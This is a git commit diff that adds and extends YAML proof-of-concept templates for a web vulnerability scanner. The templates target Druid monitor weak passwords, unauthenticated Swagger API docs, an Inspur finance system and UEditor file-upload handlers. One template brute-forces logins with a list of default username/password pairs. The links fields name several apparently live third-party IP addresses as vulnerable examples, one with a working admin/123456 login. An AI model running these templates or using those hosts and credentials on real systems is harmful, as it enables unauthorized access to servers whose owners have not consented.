init: sync poc

2025-07-13 21:02:44 +08:00 · 2025-06-11 00:17:15 +08:00 · 2025-06-11 00:17:15 +08:00 · f25afe6e97
commit f25afe6e97
parent 9ee51a96d8
5 changed files with 85 additions and 3 deletions
--- a/WebScan/pocs/druid-monitor-unauth.yml
+++ b/WebScan/pocs/druid-monitor-unauth.yml
@ -8,3 +8,4 @@ detail:
  author: met7or
  links:
    - https://github.com/alibaba/druid
+    - http://43.130.61.224:8088/druid/index.html
--- a/WebScan/pocs/druid-monitor-weakpass.yml
+++ b/WebScan/pocs/druid-monitor-weakpass.yml
@ -0,0 +1,34 @@
+name: poc-yaml-druid-monitor-weakpass
+sets:
+  weakpass:
+    - loginUsername=admin&loginPassword=admin
+    - loginUsername=ry&loginPassword=123456
+    - loginUsername=admin&loginPassword=123456
+    - loginUsername=ruoyi&loginPassword=admin123
+    - loginUsername=dy&loginPassword=123456
+    - loginUsername=ruoyi&loginPassword=123456
+    - loginUsername=dy&loginPassword=admin123
+    - loginUsername=druid&loginPassword=druid
+    - loginUsername=admin&loginPassword=admin123
+  uri:
+    - /
+    - /api/
+    - /admin/
+    - /admin-api/
+    - /prod-api/
+    - /jeecg-boot/
+    - /dev-api/
+    - /system/
+    - /webpage/system/
+rules:
+  - method: POST
+    # path: /druid/datasource.json
+    path: "{{uri}}druid/datasource.json"
+    body: "{{weakpass}}"
+    expression: |
+      response.status == 200 && response.body.bcontains(b"FilterClassNames") && response.body.bcontains(b"com.alibaba.druid")
+detail:
+  author: rootmog
+  links:
+    - https://github.com/alibaba/druid
+    - http://39.108.94.156:8086/druid/index.html(admin/123456)\
--- a/WebScan/pocs/inspur-cwbase.yml
+++ b/WebScan/pocs/inspur-cwbase.yml
@ -0,0 +1,12 @@
+name: poc-yaml-inspur-cwbase
+rules:
+  - method: GET
+    path: /cwbase/
+    follow_redirects: true
+    expression: |
+      response.body.bcontains(bytes("weblogin/index.aspx"))
+detail:
+  author: liuy
+  info: inspur-cwbase
+  links:
+    - https://blog.csdn.net/zzxx191z/article/details/140689290
--- a/WebScan/pocs/swagger-ui-unauth.yml
+++ b/WebScan/pocs/swagger-ui-unauth.yml
@ -10,6 +10,13 @@ sets:
    - actuator/swagger-ui.html
    - libs/swagger-ui.html
    - template/swagger-ui.html
+    - v2/api-docs
+    - v3/api-docs
+    - prod-api/v2/api-docs
+    - prod-api/v3/api-docs
+    - swagger/docs/v1
+    - swagger-resources
+    - prod-api/swagger-resources
    - api_docs
    - api/docs/
    - api/index.html
@ -23,8 +30,10 @@ rules:
  - method: GET
    path: /{{path}}
    expression: |
-      response.status == 200 && (response.body.bcontains(b"Swagger UI") || response.body.bcontains(b"swagger-ui.min.js")|| response.body.bcontains(b'swagger:') || response.body.bcontains(b'swagger:') || response.body.bcontains(b'Swagger 2.0') ||  response.body.bcontains(b"\"swagger\":") )
+      response.status == 200 && (response.body.bcontains(b"Swagger UI") || response.body.bcontains(b"swagger-ui.min.js")|| response.body.bcontains(b'swagger:') || response.body.bcontains(b'swagger:') || response.body.bcontains(b'Swagger 2.0') ||  response.body.bcontains(b"\"openapi\":") ||  response.body.bcontains(b"\"swagger\":")  ||  response.body.bcontains(b"\"swaggerVersion\":"))
 detail:
  author: AgeloVito
  links:
    - https://blog.csdn.net/u012206617/article/details/109107210
+    - https://aqsys.tapig.com/stage-api/swagger-resources
+    - http://39.98.195.144:8043/swagger/ui/index(http://39.98.195.144:8043/swagger/docs/v1)
--- a/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml
+++ b/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml
@ -1,7 +1,32 @@
 name: poc-yaml-ueditor-cnvd-2017-20077-file-upload
+sets:
+  uri:
+    - /
+    - /content/
+    - /Content/plugins/
+    - /Content/js/
+    - /Utility/
+    - /js/
+    - /plugins/
+    - /scripts/
+    - /Scripts/
+    - /WebComm/CommScripts/
+    - /static/
+  edit:
+    - ueditor
+    - Ueditor
+    - editor
+    - ueditor1_4_3_3
+    - ueditor1_4_3_3-utf8-net/utf8-net
+  net:
+    - /net/
+    - /
+  controller:
+    - controller.ashx?
+    - "?"
 rules:
  - method: GET
-    path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8
+    path: "{{uri}}{{edit}}{{net}}{{controller}}ccc=test&action=catchimage&encode=utf-8"
    headers:
      Accept-Encoding: 'deflate'
    follow_redirects: false
@ -13,5 +38,6 @@ detail:
  links:
    - https://zhuanlan.zhihu.com/p/85265552
    - https://www.freebuf.com/vuls/181814.html
+    - http://123.57.69.82:20000/Utility/UEditor/net?action=catchimage
  exploit: >-
    http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8